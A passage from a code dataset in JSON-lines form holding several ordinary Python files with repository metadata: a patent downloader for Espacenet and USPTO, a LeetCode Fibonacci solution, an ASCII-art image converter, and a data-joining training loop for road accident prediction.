'biblio', # biblio includes authors, title, abstract, document id, year, applicant-name:\r\n        # https://worldwide.espacenet.com/help?locale=en_EP&method=handleHelpTopic&topic=bibliographic\r\n        constituents = [] # optional, list of constituents\r\n    )\r\n\r\n# The doc number is a number given to a patent application when it is filed, published, or re-registered. \r\n# The number contains a two digit series code followed by a six digit serial number \r\n# assigned by the USPTO (Example: US9748552). 
Document kind must not be included into the doc_number\r\ndef download_patents_from_ops(patnum_file:str, patent_dir:str,allowed_cpc_codes:set):\r\n #patnum_file must have document IDs for download in the first column\r\n #middlewares = [mw.Dogpile(),mw.Throttler()] \r\n exist_docnums = cache_exist_patnum(patent_dir)\r\n print('Patent directory \"%s\" has %d patents'%(patent_dir,len(exist_docnums)))\r\n\r\n download_count = 0\r\n exist_counter = 0\r\n line_counter = 0\r\n doc_numbers = load_docnumbers(patnum_file)\r\n #doc_numbers = do_biblio_search(cql_query)# not implelented need to pass cql_query\r\n start = time.time()\r\n for patnum in doc_numbers:\r\n if patnum in exist_docnums: \r\n exist_counter +=1\r\n continue\r\n\r\n country, doc_number, kind = OPSxml.parse_patnum(patnum)\r\n if not kind: kind = ' '\r\n try:\r\n #downloading actual patent data\r\n patent_data = download_patent(country, doc_number, kind)\r\n except HTTPError: \r\n print('publication %s is not available' % (patnum))\r\n continue\r\n \r\n patent = OPSxml(et.fromstring(patent_data.content))\r\n patent.get_docnum()\r\n #assert(patent.pat_number == patnum)\r\n\r\n patent.write(patent_dir,allowed_cpc_codes)\r\n download_count +=1\r\n\r\n if download_count % 100 == 0:\r\n print('Download status: %d patents downloaded, %d found in current directory out of %d in \"%s\"' % (\r\n download_count,exist_counter, len(doc_numbers), patnum_file))\r\n print('Download time for %d patents is %s' %(download_count,OPSxml.execution_time(start)))\r\n start = time.time()\r\n sleep_time = 30\r\n print('will sleep for %d sec to avoid IP address block by Espacenet' %sleep_time)\r\n time.sleep(sleep_time)\r\n\r\n print('Total download: %d patents out of %d' % (download_count,line_counter))\r\n\r\ndef cleanup_patent_dir(validpatentnums:str, dir2clean:str, allowed_cpc_codes:set):\r\n valid_doc_numbers = load_docnumbers(validpatentnums)\r\n found_patnum = set()\r\n duplicate = dict()\r\n to_delete = open('to_delete.cmd', 'w', encoding='utf-8')\r\n \r\n for root, subdirs, files in os.walk(dir2clean):\r\n if files:\r\n print('searching in %s directory' % root)\r\n for xml_file in files:\r\n file_path = os.path.join(root, xml_file)\r\n try:\r\n tree = et.parse(file_path)\r\n except et.ParseError: continue\r\n patent = OPSxml(tree.getroot())\r\n #patent.get_docnum()\r\n\r\n if patent.pat_number not in valid_doc_numbers:\r\n to_delete.write('del %s\\n'% file_path)\r\n continue\r\n \r\n if patent.pat_number in found_patnum:\r\n try:\r\n duplicate[patent.pat_number].append(file_path)\r\n except KeyError:\r\n duplicate[patent.pat_number] = [file_path]\r\n continue\r\n else:\r\n found_patnum.add(patent.pat_number)\r\n patent.write(dir2clean,allowed_cpc_codes)\r\n \r\n to_delete.close()\r\n with open('dups_to_delete.cmd', 'w', encoding='utf-8') as dups:\r\n for k,v in duplicate.items():\r\n for f in v:\r\n dups.write(k+'\\t'+'del '+f+'\\n')\r\n\r\n\r\ndef download_patent_from_uspto(granted_patent_num, patent_dir:str,allowed_cpc_codes:set):\r\n params = {'patentNumber': str(granted_patent_num), 'start':0, 'rows':100, 'largeTextSearchFlag':'N'}\r\n data = urllib.parse.urlencode(params, quote_via=urllib.parse.quote)\r\n baseURL = 'https://developer.uspto.gov/ibd-api/v1/application/grants?'\r\n url = baseURL+data\r\n response = requests.get(url)\r\n result = json.loads(response.text)\r\n if result['results']:\r\n patent = USPTOjson(result['results'][0])\r\n patent.write(patent_dir,allowed_cpc_codes)\r\n\r\ndef 
download_patents_from_uspto(docnum_file,column_with_id,patent_dir:str,allowed_cpc_codes:set):\r\n    docnums = load_docnumbers(docnum_file,column_with_id,has_header=True)\r\n    for n in docnums:\r\n        download_patent_from_uspto(n,patent_dir,allowed_cpc_codes)\r\n\r\nif __name__ == \"__main__\":\r\n    patent_dir = 'D:/Python/Patents/Espacenet/Englis2/'\r\n    allowed_cpc_codes = {'A61K9-0073', 'A61K9-0075', 'A61K9-0078'}\r\n    #cleanup_patent_dir('A61K9 patent numbers all.txt',patent_dir,allowed_cpc_codes)\r\n    #download_patents_from_ops('A61K9 patent numbers all.txt',patent_dir,allowed_cpc_codes)\r\n    #download_patents_from_uspto('USPTO formulation patents.txt',1,'D:/Python/Patents/full patents with claims/USPTO/',allowed_cpc_codes)", "repo_name": "AntonYuryev/ElsevierAPI", "sub_path": "ElsevierAPI/ETM_API/ops.py", "file_name": "ops.py", "file_ext": "py", "file_size_in_byte": 27075, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xml.etree.ElementTree.ElementTree", "line_number": 62, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 62, "usage_type": "name"}, {"api_name": "references.DocMine", "line_number": 66, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 72, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 72, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 77, "usage_type": "argument"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 88, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 102, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 103, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 103, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 111, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 111, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 116, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 116, "usage_type": "name"}, {"api_name": "references.AUTHORS", "line_number": 171, "usage_type": "argument"}, {"api_name": "references.ABSTRACT", "line_number": 179, "usage_type": "argument"}, {"api_name": "references.TITLE", "line_number": 184, "usage_type": "name"}, {"api_name": "references.TITLE", "line_number": 187, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 198, "usage_type": "name"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 203, "usage_type": "call"}, {"api_name": "xml.dom.minidom", "line_number": 203, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 203, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 203, "usage_type": "name"}, {"api_name": "references.DocMine", "line_number": 207, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 208, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 208, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 211, "usage_type": "argument"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 217, "usage_type": "name"}, {"api_name": "references.ABSTRACT", "line_number": 238, "usage_type": "argument"}, 
{"api_name": "references.AUTHORS", "line_number": 248, "usage_type": "argument"}, {"api_name": "references.CLAIMS", "line_number": 253, "usage_type": "argument"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 258, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 258, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 259, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 259, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 270, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 270, "usage_type": "name"}, {"api_name": "references.DocMine", "line_number": 274, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 279, "usage_type": "name"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 284, "usage_type": "name"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 288, "usage_type": "name"}, {"api_name": "references.AUTHORS", "line_number": 318, "usage_type": "argument"}, {"api_name": "references.ABSTRACT", "line_number": 326, "usage_type": "argument"}, {"api_name": "references.CLAIMS", "line_number": 344, "usage_type": "argument"}, {"api_name": "references.TITLE", "line_number": 348, "usage_type": "name"}, {"api_name": "references.TITLE", "line_number": 351, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 364, "usage_type": "name"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 366, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 378, "usage_type": "call"}, {"api_name": "json.load", "line_number": 382, "usage_type": "call"}, {"api_name": "epo_ops.Client", "line_number": 449, "usage_type": "call"}, {"api_name": "requests.models.HTTPError", "line_number": 453, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 458, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 458, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 478, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path", "line_number": 482, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 484, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 484, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 485, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 485, "usage_type": "name"}, {"api_name": "epo_ops.Client", "line_number": 498, "usage_type": "call"}, {"api_name": "epo_ops.models.Docdb", "line_number": 501, "usage_type": "call"}, {"api_name": "epo_ops.models", "line_number": 501, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 521, "usage_type": "call"}, {"api_name": "requests.models.HTTPError", "line_number": 532, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 536, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 536, "usage_type": "name"}, {"api_name": "time.time", "line_number": 547, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 550, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 560, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 564, "usage_type": "call"}, {"api_name": "os.path", "line_number": 564, "usage_type": "attribute"}, {"api_name": 
"xml.etree.ElementTree.parse", "line_number": 566, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 566, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 567, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 567, "usage_type": "name"}, {"api_name": "urllib.parse.parse.urlencode", "line_number": 594, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 594, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 594, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 597, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 598, "usage_type": "call"}]}
+{"seq_id": "18735788719", "text": "#\n# @lc app=leetcode id=509 lang=python3\n#\n# [509] Fibonacci Number\n#\n\n# @lc code=start\nfrom functools import cache\n\nclass Solution:\n @cache\n def fib(self, n: int) -> int:\n return n if n < 2 else self.fib(n-2) + self.fib(n-1)\n \n \n# @lc code=end\n\nn = 42\n\n\ndef log(func):\n def wrapper(*args, **kw):\n from datetime import datetime \n time_start = datetime.now()\n #print('call %s():' % func.__name__)\n r = func(*args, **kw)\n time_end = datetime.now()\n print(\"---\\ntime cost:\",time_end-time_start)\n return r\n return wrapper\n\n@log\ndef run():\n so = Solution()\n r = so.fib(n)\n print(r)\n\nrun()", "repo_name": "lancelijade/leetcode", "sub_path": "vscode/509.fibonacci-number.py", "file_name": "509.fibonacci-number.py", "file_ext": "py", "file_size_in_byte": 674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "functools.cache", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "7803244048", "text": "import numpy as np\r\nimport cv2 as cv2\r\nimport matplotlib.pyplot as plt\r\n\r\n######## CONSTANTS ########\r\nimage_name = \"../content/sample_data/liverpoolLogo.png\"\r\nascii_max_x = 40\r\nascii_max_y = 40\r\nthreshold = 127\r\nart_char = \"█\"\r\n######## ######### ########\r\n\r\nimage_name = \"../content/sample_data/liverpoolLogo.png\"\r\nimg = cv2.imread(image_name, cv2.IMREAD_GRAYSCALE)\r\n\r\n\r\n_, img = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\r\n\r\nimg = cv2.resize(img, (ascii_max_x, ascii_max_y)) \r\n\r\nresult = \"\"\r\nfor i in range(ascii_max_x):\r\n for j in range(ascii_max_y):\r\n if img[(i, j)] > threshold:\r\n result += art_char\r\n else:\r\n result += \" \"\r\n result += \"\\n\"\r\nprint(\"NORMAL\")\r\nprint(result)\r\n\r\ninverted = \"\"\r\nfor i in range(ascii_max_x):\r\n for j in range(ascii_max_y):\r\n if img[(i, j)] > threshold:\r\n inverted += \" \"\r\n else:\r\n inverted += art_char\r\n inverted += \"\\n\"\r\nprint(\"INVERTED\")\r\nprint(inverted)\r\n", "repo_name": "yousefh409/asciiArtCreator", "sub_path": "ascii_art_creator.py", "file_name": "ascii_art_creator.py", "file_ext": "py", "file_size_in_byte": 935, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "72006334490", "text": "\"\"\"feature_impact_review.py: Returns X_train, y_train, X_val, y_val, pre_sample_train_local for feature selection process\"\"\"\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import ParameterGrid\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier, AdaBoostClassifier\nfrom sklearn.linear_model import LogisticRegression, Perceptron, SGDClassifier, OrthogonalMatchingPursuit, RandomizedLogisticRegression\nfrom sklearn.neighbors.nearest_centroid import NearestCentroid\nfrom sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import *\nimport numpy as np\nfrom utils import read_exp_utils\nfrom utils.write_exp_utils import ResultConfig, create_parameter_id\nfrom utils.misc_utils import calculate_accident_pct\nfrom xgboost import XGBClassifier\n\nfrom datetime import datetime\nfrom utils.orchestra_utils import preprocessor, sampler, rinse_spines, temporal_split, return_timed_spine, generate_temporal_features\n\n\nCLASSIFIER_CONFIG = {\n 'XG': XGBClassifier(),\n 'RF': RandomForestClassifier(),\n 'LR': LogisticRegression(),\n 'KNN': KNeighborsClassifier(n_neighbors=3),\n 'NB': GaussianNB(),\n 'ET': ExtraTreesClassifier(),\n 'AB': AdaBoostClassifier(),\n 'SVM': LinearSVC(), \n 'GB': GradientBoostingClassifier(),\n 'DT': DecisionTreeClassifier(), \n 'SGD': SGDClassifier()\n}\n\nimport pandas as pd\n\ndef load_experiment(experiment_id:int):\n out = read_exp_utils.read_experiment(experiment_id) \n classifier_config = out[0]\n grid_config = out[1]\n return classifier_config, grid_config \n\n############## PRECISION AT K\ndef joint_sort_descending(l1, l2):\n # l1 and l2 have to be numpy arrays\n idx = np.argsort(l1)[::-1]\n return l1[idx], l2[idx]\n\n\ndef generate_binary_at_k(y_scores, k):\n cutoff_index = int(len(y_scores) * (k / 100.0))\n test_predictions_binary = [1 if x < cutoff_index else 0 for x in range(len(y_scores))]\n return test_predictions_binary\n\n\ndef precision_at_k(y_true, y_scores, k):\n y_scores, y_true = joint_sort_descending(np.array(y_scores), np.array(y_true))\n preds_at_k = generate_binary_at_k(y_scores, k)\n #precision, _, _, _ = metrics.precision_recall_fscore_support(y_true, preds_at_k)\n #precision = precision[1] # only interested in precision for label 1\n precision = precision_score(y_true, preds_at_k)\n return precision\n\n\n\n\nfrom sklearn.metrics import *\n\nfrom utils.write_exp_utils import ResultConfig\n\nimport pickle\n\n\ndef adjusted_pred(y_pred_probs, t):\n \"\"\"\n Return predictions based on a given threshold(t)\n \"\"\"\n return [1 if y >= t else 0 for y in y_pred_probs]\n\ndef precision_recall_thresholds(y_true, y_pred_probs,threshold_step=0.01):\n precision_list = list()\n recall_list = list()\n thresholds=np.arange(0.0, 1.0, threshold_step)\n for t in thresholds:\n y_pred = adjusted_pred(y_pred_probs,t)\n precision_list.append(precision_score(y_true,y_pred,pos_label=1))\n recall_list.append(recall_score(y_true,y_pred,pos_label=1))\n #Recreate output in 
http://scikit-learn.org/stable/modules/generated/sklearn.metrics.precision_recall_curve.html#sklearn.metrics.precision_recall_curve\n precision_list.append(1.0)\n recall_list.append(0.0)\n return precision_list, recall_list, thresholds\n\n\n\n\ndef train_loop(spine_label,\n\n spine_test,\n\n experiment,\n conn\n ):\n \n \n print(spine_label.columns)\n \n grid_parameters = experiment.GRID_PARAMETERS\n classifiers = experiment.CLASSIFIERS\n experiment_id = experiment.EXPERIMENT_ID\n random_state = experiment.RANDOM_SEED\n \n print(\"\"\"\n ####################\n ## NEGATIVE SAMPLING (TEST)\n ####################\"\"\")\n \n \n print(spine_test.columns)\n \n if experiment.SAMPLE_TEST:\n print('Starting with Sampling for Test')\n spine_test = sampler(spine=spine_test, conn=conn, start_date=experiment.TEST_LABEL_START, seed=experiment.RANDOM_SEED,\n end_date=experiment.TEST_LABEL_END, **experiment.TEST_SAMPLE_METHOD_PARAMS)\n\n \n \n minimum_gap_size = experiment.VALIDATION_CONFIG['minimum_gap_size']\n rolling_type = experiment.VALIDATION_CONFIG['rolling_type']\n minimum_train_size = experiment.VALIDATION_CONFIG['minimum_train_size']\n minimum_val_size = experiment.VALIDATION_CONFIG['minimum_val_size']\n \n \n q = 'select end_datetime, hectokey_merged, {0} from {1}'.format(','.join(experiment.FEATURES_FLOW_LIST), experiment.FEATURES_FLOW_TABLE )\n \n with open('temp.txt', 'w') as f:\n f.write(q)\n print('Loading flow table') \n flow_feature_table = pd.read_sql('select end_datetime, hectokey_merged, {0} from {1}'.format(\n ','.join(experiment.FEATURES_FLOW_LIST),experiment.FEATURES_FLOW_TABLE), con=conn)\n\n print('Loading Ongevallen Data')\n ongevallen_feature_table = pd.read_sql('select datetime, hectokey_merged, {0} from {1}'.format(','.join(experiment.FEATURES_ONGEVALLEN_LIST),\n experiment.FEATURES_ONGEVALLEN_TABLE), con=conn)\n \n print('Loading Weather Feature Data')\n weather_station = pd.read_sql('select * from {0}'.format(experiment.WEATHER_STATION_MAPPING_TABLE), con=conn)\n knmi_feature_table = pd.read_sql('select datetime, weather_station, {0} from {1}'.format(\n ','.join(experiment.FEATURES_KNMI_LIST),experiment.FEATURES_KNMI_TABLE), con=conn)\n \n print('Loading Hectopunten Feature Data')\n hectopunten_feature_table = pd.read_sql('select rollup_year, hectokey_merged, {0} from {1}'.format(\n ','.join(experiment.FEATURES_HECTOPUNTEN_LIST),experiment.FEATURES_HECTOPUNTEN_TABLE), con=conn)\n \n \n print('Loading Temporal Feature Data')\n temporal_feature_table = pd.read_sql('select datetime, {0} from {1}'.format(','.join(experiment.FEATURES_TEMPORAL_LIST), experiment.FEATURES_TEMPORAL_TABLE), con=conn)\n \n print('Starting splits') \n for split_num, split in enumerate(temporal_split(experiment.LABEL_START, experiment.LABEL_END, minimum_gap_size,\n rolling_type, minimum_train_size, minimum_val_size)):\n if split_num>0:\n break \n\n print(split)\n\n # Do the processing of the splits here. 
\n spine_train_local = return_timed_spine(spine_label, split['train_start'], split['train_end'])\n spine_val_local = return_timed_spine(spine_label, split['val_start'], split['val_end'])\n #Calcuate accident percentage \n pre_sample_train_local = spine_train_local\n experiment.TIME_GRANULARITY=60 ####REPLACE THIS LINE ONCE NEW experiment table is ready\n accident_pct_train_pre_sample=calculate_accident_pct(experiment.SEGMENTATION_TABLE,experiment.TIME_GRANULARITY,split['train_start'],split['train_end'],pre_sample_train_local)\n print(\"\"\"\n ####################\n ## NEGATIVE SAMPLING (TRAIN/VAL)\n ####################\"\"\")\n \n #Sampling\n if experiment.SAMPLE_TRAIN:\n print('Starting with Sampling for Train')\n print('Original Shape:', spine_train_local.shape)\n spine_train_local = sampler(conn=conn, spine=spine_train_local, start_date=split['train_start'], seed=experiment.RANDOM_SEED, end_date=split['train_end'], **experiment.TRAIN_SAMPLE_METHOD_PARAMS)\n \n print(spine_train_local.columns)\n\n if experiment.SAMPLE_VAL:\n print('Starting with Sampling for Val')\n spine_val_local = sampler(conn=conn, spine=spine_val_local, start_date=split['val_start'], seed=experiment.RANDOM_SEED,\n end_date=split['val_end'], **experiment.VAL_SAMPLE_METHOD_PARAMS)\n \n \n \n \n print('''\n ####################\n ## GENERATING LAG AND LAG_ROUNDED\n ####################''')\n\n timedelta = pd.Timedelta(value=experiment.TIME_LAG_MINUTES, unit='m')\n\n spine_train_local.loc[:,\"datetime_rounded_lag\"] = spine_train_local.datetime_rounded - timedelta\n spine_val_local.loc[:,\"datetime_rounded_lag\"] = spine_val_local.datetime_rounded - timedelta\n\n\n #### DATETIME LAG ROUNDED FOR JOINING TO KNMI\n #60m is hard-coded here KNMI granularity is hardcoded.\n spine_train_local.loc[:,\"datetime_rounded_lag_rounded_weather\"] = spine_train_local.loc[:,'datetime_rounded_lag'].dt.floor('60min')\n spine_val_local.loc[:,\"datetime_rounded_lag_rounded_weather\"] = spine_val_local.loc[:,'datetime_rounded_lag'].dt.floor('60min')\n\n \n #### DATETIME LAG ROUNDED FOR JOINING FLOW\n spine_train_local.loc[:,\"datetime_rounded_lag_rounded_flow\"] = spine_train_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_FLOW_CONFIG['time_granularity_min']))\n spine_val_local.loc[:,\"datetime_rounded_lag_rounded_flow\"] = spine_val_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_FLOW_CONFIG['time_granularity_min']))\n\n \n #### YEAR LAG FOR JOINING HECTOPUNTEN\n spine_train_local.loc[:,\"datetime_rounded_year_minus_one\"] = spine_train_local.datetime_rounded.map(lambda x: x.year - 1)\n spine_val_local.loc[:,\"datetime_rounded_year_minus_one\"] = spine_val_local.datetime_rounded.map(lambda x: x.year - 1)\n \n #### DATETIME LAG ROUNDED FOR JOINING ONGEVALLEN\n spine_train_local.loc[:,\"datetime_rounded_lag_rounded_ongevallen\"] = spine_train_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_ONGEVALLEN_CONFIG['time_granularity_min']))\n spine_val_local.loc[:,\"datetime_rounded_lag_rounded_ongevallen\"] = spine_val_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_ONGEVALLEN_CONFIG['time_granularity_min']))\n\n\n print('Spine Train: ')\n print(spine_train_local.shape)\n print('Spine Val ')\n print(spine_val_local.shape)\n\n \n \n \n print('''\n ####################\n ## JOINING FEATURES\n ####################''')\n\n \n print('''\n ####################\n ### KNMI\n ####################''')\n\n \n\n spine_train_local 
= pd.merge(spine_train_local, weather_station, on='hectokey_merged', how='left')\n spine_val_local = pd.merge(spine_val_local, weather_station, on='hectokey_merged', how='left')\n\n \n\n spine_train_local = pd.merge(spine_train_local, knmi_feature_table, \n left_on=['datetime_rounded_lag_rounded_weather','weather_station'],\n right_on=['datetime', 'weather_station'], how='left')\n\n spine_val_local = pd.merge(spine_val_local, knmi_feature_table,\n left_on=['datetime_rounded_lag_rounded_weather','weather_station'],\n right_on=['datetime','weather_station'], how='left')\n\n# print('Spine Label: ')\n# print(spine_label.shape)\n# print('Spine Test: ')\n# print(spine_test.shape)\n\n\n print('''\n #################\n ### HECTOPUNTENT\n #################''')\n\n \n\n spine_train_local = pd.merge(spine_train_local, hectopunten_feature_table,\n left_on=['datetime_rounded_year_minus_one','hectokey_merged'],\n right_on=['rollup_year','hectokey_merged'], how='left')\n\n spine_val_local = pd.merge(spine_val_local, hectopunten_feature_table,\n left_on=['datetime_rounded_year_minus_one','hectokey_merged'],\n right_on=['rollup_year','hectokey_merged'], how='left')\n\n\n\n# print('Spine Label: ')\n# print(spine_label.shape)\n# print('Spine Test: ')\n# print(spine_test.shape)\n\n print('''\n ########################\n ### JOINING FLOW FEATURES\n ########################''')\n\n\n\n spine_train_local = pd.merge(spine_train_local, flow_feature_table,\n left_on=['datetime_rounded_lag_rounded_flow','hectokey_merged'],\n right_on=['end_datetime','hectokey_merged'], how='left')\n\n spine_val_local = pd.merge(spine_val_local, flow_feature_table,\n left_on=['datetime_rounded_lag_rounded_flow','hectokey_merged'],\n right_on=['end_datetime','hectokey_merged'], how='left')\n\n # del(flow_feature_table)\n\n\n print('Spine Label: ')\n print(spine_train_local.shape)\n print('Spine Test: ')\n print(spine_val_local.shape)\n\n\n print('''\n ###############################\n #### GENERATE TEMPORAL FEATURES\n ###############################''')\n \n spine_train_local = pd.merge(spine_train_local, temporal_feature_table, left_on='datetime_rounded', right_on='datetime', how='left')\n spine_val_local = pd.merge(spine_val_local, temporal_feature_table, left_on='datetime_rounded', right_on='datetime', how='left')\n\n\n print('Spine Label: ')\n print(spine_train_local.shape)\n print('Spine Test: ')\n print(spine_val_local.shape)\n\n \n print('''\n ###############################\n #### JOINING ONGEVALLEN FEATURES\n ###############################''')\n \n \n spine_train_local = pd.merge(spine_train_local, ongevallen_feature_table, left_on=['datetime_rounded_lag_rounded_ongevallen', 'hectokey_merged'],\n right_on=['datetime', 'hectokey_merged'], how='left')\n \n spine_val_local = pd.merge(spine_val_local, ongevallen_feature_table, left_on=['datetime_rounded_lag_rounded_ongevallen', 'hectokey_merged'],\n right_on=['datetime', 'hectokey_merged'], how='left')\n \n \n \n space_time = {'space':spine_val_local['hectokey_merged'].tolist(), 'time':[str(dtr) for dtr in spine_val_local['datetime_rounded'].tolist()]}\n print('''\n #######################################\n #### SPINE RINSING OF UNWANTED COLUMNS\n #######################################''')\n\n \n\n spine_train_local = rinse_spines(spine_train_local)\n spine_val_local = rinse_spines(spine_val_local)\n # spine_test_local = rinse_spines(spine_test)\n\n\n \n \n #TODO! spine test doesn't need to be pre-process time and again. 
But for now let it be here.\n X_train, y_train, X_val, y_val = preprocessor(spine_train_local, spine_val_local, spine_test,\n label='accidents',\n numerical_cols=experiment.NUMERICAL_FEATURES_LIST,\n categorical_cols=experiment.CATEGORICAL_FEATURES_LIST,\n ignore_test=True)\n \n return X_train, y_train, X_val, y_val, pre_sample_train_local\n", "repo_name": "dssg/rws_accident_prediction_public", "sub_path": "src/models/feature_impact_review.py", "file_name": "feature_impact_review.py", "file_ext": "py", "file_size_in_byte": 15658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "xgboost.XGBClassifier", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.ensemble.ExtraTreesClassifier", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.read_exp_utils.read_experiment", "line_number": 45, "usage_type": "call"}, {"api_name": "utils.read_exp_utils", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.argsort", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.sampler", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 149, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 153, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 163, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.temporal_split", "line_number": 166, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.return_timed_spine", "line_number": 174, "usage_type": "call"}, {"api_name": 